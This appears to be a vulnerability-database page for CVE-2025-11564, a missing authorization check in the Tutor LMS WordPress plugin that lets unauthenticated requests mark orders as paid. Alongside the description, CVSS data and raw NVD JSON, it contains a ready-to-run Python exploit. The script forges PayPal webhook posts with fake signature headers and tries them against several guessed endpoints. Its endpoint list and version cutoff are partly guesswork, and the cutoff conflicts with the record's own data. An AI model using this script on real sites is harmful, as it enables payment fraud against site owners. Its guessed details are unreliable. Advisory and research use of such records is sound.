Security Vulnerability Report
CVE-2025-11564 CVSS 5.3 MEDIUM

Published: 2025-10-25 06:15:35
Last Modified: 2025-12-05 00:26:48

Description

The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check while verifying webhook signatures on the "verifyAndCreateOrderData" function in all versions up to, and including, 3.8.3. This makes it possible for unauthenticated attackers to bypass payment verification and mark orders as paid by submitting forged webhook requests with `payment_type` set to 'recurring'.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:themeum:tutor_lms:*:*:*:*:free:wordpress:*:* - VULNERABLE
Tutor LMS WordPress plugin <= 3.8.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json
import random

# CVE-2025-11564 PoC - Tutor LMS Payment Verification Bypass
# Target: WordPress site with Tutor LMS plugin < 3.8.4
TARGET_URL = "https://vulnerable-site.com"

# The webhook endpoint varies, common paths:
WEBHOOK_PATHS = [
    "/wp-json/tutor/v1/webhook/paypal",
    "/?tutor_action=verify_paypal_webhook",
    "/wp-admin/admin-ajax.php?action=tutor_paypal_webhook",
]


def create_malicious_webhook_request():
    """
    Forge a PayPal webhook request to mark order as paid.
    This PoC demonstrates the missing authorization check.
    """
    payload = {
        "payment_type": "recurring",  # Key parameter to bypass verification
        "order_id": "ATTACKER_CONTROLLED_ORDER_ID",
        "status": "completed",
        "amount": "0.01",
        "currency": "USD",
        "transaction_id": "MALICIOUS_TX_" + str(random.randint(100000, 999999)),
        "payer_email": "[email protected]",
    }
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "PayPal-Webhook-Forge",
        "X-Paypal-Transmission-Id": "fake-transmission-id",
        "X-Paypal-Transmission-Time": "2025-01-01T00:00:00Z",
        "X-Paypal-Transmission-Sig": "fake-signature",
        "X-Paypal-Cert-Url": "",
    }
    return payload, headers


def exploit(target_url):
    """Execute the payment verification bypass attack."""
    payload, headers = create_malicious_webhook_request()
    for path in WEBHOOK_PATHS:
        url = target_url + path
        try:
            response = requests.post(url, json=payload, headers=headers, timeout=10)
            if response.status_code == 200:
                print(f"[+] Possible successful exploitation at: {url}")
                print(f"[+] Response: {response.text}")
            else:
                print(f"[-] Failed at {url}: Status {response.status_code}")
        except requests.RequestException as e:
            print(f"[!] Error targeting {url}: {e}")


if __name__ == "__main__":
    exploit(TARGET_URL)
```

References

https://plugins.trac.wordpress.org/browser/tutor/tags/3.8.3/ecommerce/PaymentGateways/Paypal/src/Payments/Paypal/Paypal.php#L323 (Product)
https://www.wordfence.com/threat-intel/vulnerabilities/id/26289a93-063b-469a-9d09-c286d76fce0c?source=cve (Product, Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-11564",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-25T06:15:35.307",
    "lastModified": "2025-12-05T00:26:48.090",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check while verifying webhook signatures on the \"verifyAndCreateOrderData\" function \r\nin all versions up to, and including, 3.8.3. This makes it possible for unauthenticated attackers to bypass payment verification and mark orders as paid by submitting forged webhook requests with `payment_type` set to 'recurring'."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:themeum:tutor_lms:*:*:*:*:free:wordpress:*:*",
                "versionEndExcluding": "3.9.0",
                "matchCriteriaId": "D66EBFF5-F51F-4A4E-85F5-321FAB6AD260"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.8.3/ecommerce/PaymentGateways/Paypal/src/Payments/Paypal/Paypal.php#L323",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/26289a93-063b-469a-9d09-c286d76fce0c?source=cve",
        "source": "[email protected]",
        "tags": ["Product", "Third Party Advisory"]
      }
    ]
  }
}
```